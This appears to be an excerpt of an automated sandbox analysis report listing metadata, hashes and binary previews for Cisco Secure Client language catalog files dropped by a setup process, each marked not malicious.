                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):348721
                                                                                                                                                                                                  Entropy (8bit):5.110965971564126
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKh3E5VBKfKh+YFxrglCbcTpLSmYYTpkDUcf8864POcncKpFsy0E5zQE+rAJ:L7hp2
                                                                                                                                                                                                  MD5:20C363D5CC6F504F8269CD61B388DCDE
                                                                                                                                                                                                  SHA1:1F8149525D4B96E42A6E3DCB75D1BEB891A0C9E0
                                                                                                                                                                                                  SHA-256:22DA7703EE811B0A7288F7BD771732B62D9284A156ED43A8E575A266134ADE9E
                                                                                                                                                                                                  SHA-512:4B8B2D03E7670E1635054591E929176781A33B6AAF9B02AF80AD19D02257EA827E9D7E5F5E4F698730AD27699FA5F7D90257EE8967C5886D2E94F18BFF621876
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):388375
                                                                                                                                                                                                  Entropy (8bit):5.9662824242248815
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogMVyKDmDma70moVBKIuDVKuAYjG+chxEb1XVnhpHg7rmYO0pK4Wl1:LjH3UKtpKDKVBKfKh+HYOSWb
                                                                                                                                                                                                  MD5:0C1C5B23F0C946634836320A60E2246B
                                                                                                                                                                                                  SHA1:9C19265229FAD61B2FCB9FA8E2DC2FDD5DFD97E0
                                                                                                                                                                                                  SHA-256:83A4965A098972336EEFD6C9F9D070BA4C546B11494423621155A2E8084B864E
                                                                                                                                                                                                  SHA-512:E08008AFDFEECA4D75ED57AB9DBAA002F1CA30C0F8B32507EABDE3367AA5152ACEF4F60230E01966F3EC38315BBCD77384F874EC69F8327AEB4720182CB10BF0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):388375
                                                                                                                                                                                                  Entropy (8bit):5.9662824242248815
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogMVyKDmDma70moVBKIuDVKuAYjG+chxEb1XVnhpHg7rmYO0pK4Wl1:LjH3UKtpKDKVBKfKh+HYOSWb
                                                                                                                                                                                                  MD5:0C1C5B23F0C946634836320A60E2246B
                                                                                                                                                                                                  SHA1:9C19265229FAD61B2FCB9FA8E2DC2FDD5DFD97E0
                                                                                                                                                                                                  SHA-256:83A4965A098972336EEFD6C9F9D070BA4C546B11494423621155A2E8084B864E
                                                                                                                                                                                                  SHA-512:E08008AFDFEECA4D75ED57AB9DBAA002F1CA30C0F8B32507EABDE3367AA5152ACEF4F60230E01966F3EC38315BBCD77384F874EC69F8327AEB4720182CB10BF0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):357929
                                                                                                                                                                                                  Entropy (8bit):6.014691052026819
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogM5PcD4sAVoVBKIuDVKuAYjG+chxEb1XVnhkv3zdYGLzOJ7CiqP0aCKo:LjH3UKwSOVBKfKh+wfBY6iJ7CLc5Ko
                                                                                                                                                                                                  MD5:B0DAAEF17D63E6DB7225FC65A5BEED25
                                                                                                                                                                                                  SHA1:CD73B824DDC96B0BCB4BA3E4BF389BF8153B2440
                                                                                                                                                                                                  SHA-256:3B0D7490F9015F37EBA158AFE26F9C56A9D35624564CD295EC596D9A6B52B340
                                                                                                                                                                                                  SHA-512:448D36E38E516A33CD5A9AB50B3DEE45B1EED40E05AC9B13B3041CC4523EB8E42EE3A88355FA27A1652D0B8D9C58DECD90FF88EEE2765D42584FD94142ACDA8B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):357929
                                                                                                                                                                                                  Entropy (8bit):6.014691052026819
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogM5PcD4sAVoVBKIuDVKuAYjG+chxEb1XVnhkv3zdYGLzOJ7CiqP0aCKo:LjH3UKwSOVBKfKh+wfBY6iJ7CLc5Ko
                                                                                                                                                                                                  MD5:B0DAAEF17D63E6DB7225FC65A5BEED25
                                                                                                                                                                                                  SHA1:CD73B824DDC96B0BCB4BA3E4BF389BF8153B2440
                                                                                                                                                                                                  SHA-256:3B0D7490F9015F37EBA158AFE26F9C56A9D35624564CD295EC596D9A6B52B340
                                                                                                                                                                                                  SHA-512:448D36E38E516A33CD5A9AB50B3DEE45B1EED40E05AC9B13B3041CC4523EB8E42EE3A88355FA27A1652D0B8D9C58DECD90FF88EEE2765D42584FD94142ACDA8B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):347088
                                                                                                                                                                                                  Entropy (8bit):5.137429334753401
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogMlckwL1nSoVBKIuDVKuAYjG+chxEb1XVnhMmpLSr1LgO0+1zfykgRhr8:LjH3UKtcpnnVBKfKh+jFP0Z
                                                                                                                                                                                                  MD5:F9ABBCA86A0DAB6C01915CB745CDE31A
                                                                                                                                                                                                  SHA1:49FF0DB4BDCF002AC981AADEAF839FB9F210F28F
                                                                                                                                                                                                  SHA-256:281772D7111DBEE29EE3728CDC56634B4D75AC16E681D66B008EEFECAF6277B3
                                                                                                                                                                                                  SHA-512:76E4FB468C76ADA1B355F7786CF9EE57DCEAB3294E57310B4BA8B9BB84A6EFB4F3BDFB31B4541DBC461164E521496B0287BE0ACC09732E3089B49E491D130FAB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):347088
                                                                                                                                                                                                  Entropy (8bit):5.137429334753401
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:LjH3U1ogMlckwL1nSoVBKIuDVKuAYjG+chxEb1XVnhMmpLSr1LgO0+1zfykgRhr8:LjH3UKtcpnnVBKfKh+jFP0Z
                                                                                                                                                                                                  MD5:F9ABBCA86A0DAB6C01915CB745CDE31A
                                                                                                                                                                                                  SHA1:49FF0DB4BDCF002AC981AADEAF839FB9F210F28F
                                                                                                                                                                                                  SHA-256:281772D7111DBEE29EE3728CDC56634B4D75AC16E681D66B008EEFECAF6277B3
                                                                                                                                                                                                  SHA-512:76E4FB468C76ADA1B355F7786CF9EE57DCEAB3294E57310B4BA8B9BB84A6EFB4F3BDFB31B4541DBC461164E521496B0287BE0ACC09732E3089B49E491D130FAB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):352370
                                                                                                                                                                                                  Entropy (8bit):5.387002164805478
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKisfdVbVBKfKh+tps+fpWQUbSKN/dTkL4ecW:L7h/VojUbS
                                                                                                                                                                                                  MD5:40675B2B9871F33C2739B9636A54EE25
                                                                                                                                                                                                  SHA1:9E16B111B97E810EB5E32FF935649DD5057AFD52
                                                                                                                                                                                                  SHA-256:C165FF2D1226D1653E42E133DCD3346B3C239779C4EAFF2FA05D8A8416AABEE1
                                                                                                                                                                                                  SHA-512:1C1908139C3A4072431D74360513369CFBDD4F0E9EB839457A3C15622A2C5983278DA2BB883CD159C358C143C17CDDC37C54A92F691E313DDE4DC891AF1D1F99
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):352370
                                                                                                                                                                                                  Entropy (8bit):5.387002164805478
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKisfdVbVBKfKh+tps+fpWQUbSKN/dTkL4ecW:L7h/VojUbS
                                                                                                                                                                                                  MD5:40675B2B9871F33C2739B9636A54EE25
                                                                                                                                                                                                  SHA1:9E16B111B97E810EB5E32FF935649DD5057AFD52
                                                                                                                                                                                                  SHA-256:C165FF2D1226D1653E42E133DCD3346B3C239779C4EAFF2FA05D8A8416AABEE1
                                                                                                                                                                                                  SHA-512:1C1908139C3A4072431D74360513369CFBDD4F0E9EB839457A3C15622A2C5983278DA2BB883CD159C358C143C17CDDC37C54A92F691E313DDE4DC891AF1D1F99
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):347902
                                                                                                                                                                                                  Entropy (8bit):5.1986177425205575
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKI0MSKZVBKfKh+Ec3LVWxcdXpnY3eURwoqL:L7haJ6
                                                                                                                                                                                                  MD5:B4D5001D372A2A132C4E7D55EAE51207
                                                                                                                                                                                                  SHA1:7EF98532BD39FB2A157A84824EE85BE6856BE3E0
                                                                                                                                                                                                  SHA-256:74D771DF4E83F0D39244FBA32EC6EC10B455398FC2807AD0019ADE29D175935C
                                                                                                                                                                                                  SHA-512:9BAF4D5B332EE1EF8708DE77463D869FB28EB8CD645978E64C8194E40A3C3D681F23313E18654B64EA6C6D1AB075B26628E2B34F2EF608BF1A76CB3427CDFD72
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):347902
                                                                                                                                                                                                  Entropy (8bit):5.1986177425205575
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UKI0MSKZVBKfKh+Ec3LVWxcdXpnY3eURwoqL:L7haJ6
                                                                                                                                                                                                  MD5:B4D5001D372A2A132C4E7D55EAE51207
                                                                                                                                                                                                  SHA1:7EF98532BD39FB2A157A84824EE85BE6856BE3E0
                                                                                                                                                                                                  SHA-256:74D771DF4E83F0D39244FBA32EC6EC10B455398FC2807AD0019ADE29D175935C
                                                                                                                                                                                                  SHA-512:9BAF4D5B332EE1EF8708DE77463D869FB28EB8CD645978E64C8194E40A3C3D681F23313E18654B64EA6C6D1AB075B26628E2B34F2EF608BF1A76CB3427CDFD72
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):467531
                                                                                                                                                                                                  Entropy (8bit):5.410391422981112
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:L7hsbx/gNDWv68D6Iv6x5RaGUT0fDmKuajZHd+1wt8:L7a6FmG8
                                                                                                                                                                                                  MD5:2C1A2A453E54BFCEE2E97D458843C3BE
                                                                                                                                                                                                  SHA1:DF8512B13FB56BB6FCCC5BA01C91D42949875B44
                                                                                                                                                                                                  SHA-256:535CD27F4C25F5C007432FFD985C7EA3325659F2D1544264F317E71DD3377E84
                                                                                                                                                                                                  SHA-512:2351333B17AB072A2AC9E24D0772775D3519A3163EEB6BAB735845BBC96A51380A181C4E99AD21BECD99F8ED256E845DC421B773F33DD45E260783E90CA66333
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):467531
                                                                                                                                                                                                  Entropy (8bit):5.410391422981112
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:L7hsbx/gNDWv68D6Iv6x5RaGUT0fDmKuajZHd+1wt8:L7a6FmG8
                                                                                                                                                                                                  MD5:2C1A2A453E54BFCEE2E97D458843C3BE
                                                                                                                                                                                                  SHA1:DF8512B13FB56BB6FCCC5BA01C91D42949875B44
                                                                                                                                                                                                  SHA-256:535CD27F4C25F5C007432FFD985C7EA3325659F2D1544264F317E71DD3377E84
                                                                                                                                                                                                  SHA-512:2351333B17AB072A2AC9E24D0772775D3519A3163EEB6BAB735845BBC96A51380A181C4E99AD21BECD99F8ED256E845DC421B773F33DD45E260783E90CA66333
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):312691
                                                                                                                                                                                                  Entropy (8bit):6.238069670792444
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UK5pl6VBKfKh+spMr61W19INBYB4XGt48xITy:L7h3upMrT19INBYB4XGt48x+y
                                                                                                                                                                                                  MD5:05212F97A23F922493CD7F066373D92C
                                                                                                                                                                                                  SHA1:F8C2E7CD2949950A1227F02058B82E81876F5C73
                                                                                                                                                                                                  SHA-256:66997C101367684439899AC5A287CF194AC7E0BA9CBA753BC620D15B8F98193E
                                                                                                                                                                                                  SHA-512:40BB0959EDBD50068288328C8FA268F856BFB70A3737E84E129AE9A1400BF182975D2AD0BEBD5E271A30F7A893BA15CE472A9A80869D58378402CC2D822F97E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):312691
                                                                                                                                                                                                  Entropy (8bit):6.238069670792444
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UK5pl6VBKfKh+spMr61W19INBYB4XGt48xITy:L7h3upMrT19INBYB4XGt48x+y
                                                                                                                                                                                                  MD5:05212F97A23F922493CD7F066373D92C
                                                                                                                                                                                                  SHA1:F8C2E7CD2949950A1227F02058B82E81876F5C73
                                                                                                                                                                                                  SHA-256:66997C101367684439899AC5A287CF194AC7E0BA9CBA753BC620D15B8F98193E
                                                                                                                                                                                                  SHA-512:40BB0959EDBD50068288328C8FA268F856BFB70A3737E84E129AE9A1400BF182975D2AD0BEBD5E271A30F7A893BA15CE472A9A80869D58378402CC2D822F97E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:........n........[..C...................................................$...+.......+...........:.......Q...c...l...`...........1.......P...;...........-...^.../...G.......@.......B...........Z...;...f...Y...............................;...........X.......n.......u.......}.......................................;.......R.......d.......w.......................[.......n...?...~...(.......0...................-.......@.......].......c.......l.......................[.......D.......K.......[.......p...............................................................'...e...D...#...............6...t...........................=.......?.......W...)...#...................%..._.......,.......@...8...8...y.../.......N.......E...1...0...w...c.......;.......)...H...y...r...4.......[...!.......}...........v.......*.......H...5...A...~...V.......\.......n...t...X.......q...<...7.......1.......d.......U...}...0.......k...........p.......%.......).......I.......U.......r...$...................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:GNU message catalog (little endian), revision 0.0, 2926 messages, Project-Id-Version: Cisco Secure Client 5.0.00000
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):312693
                                                                                                                                                                                                  Entropy (8bit):6.237794032422467
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:LjH3UK4rOZVBKfKh+VpMr61W19INBYB4XGt48xITy:L7h4ppMrT19INBYB4XGt48x+y
                                                                                                                                                                                                  MD5:15A97AEAB455C7659F975BF82E1FD0AA
                                                                                                                                                                                                  SHA1:811FE4D65EDD072EB5FE66FBBFC49EA7E74A2D33
                                                                                                                                                                                                  SHA-256:C71C31ED87B28224850C804EBFA8CBF2B7FAF3AA9AAD453269BCE3BEBC288243
                                                                                                                                                                                                  SHA-512:61A3C8E99A1D7F37AE9DF2FA1BE97BDBB4A83A2A676BF1C1E5C7169CFEC44AF13975E4140CA0118586DDBE774C3F1269691D7C4C7BB41A9557A55836BD568A6F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
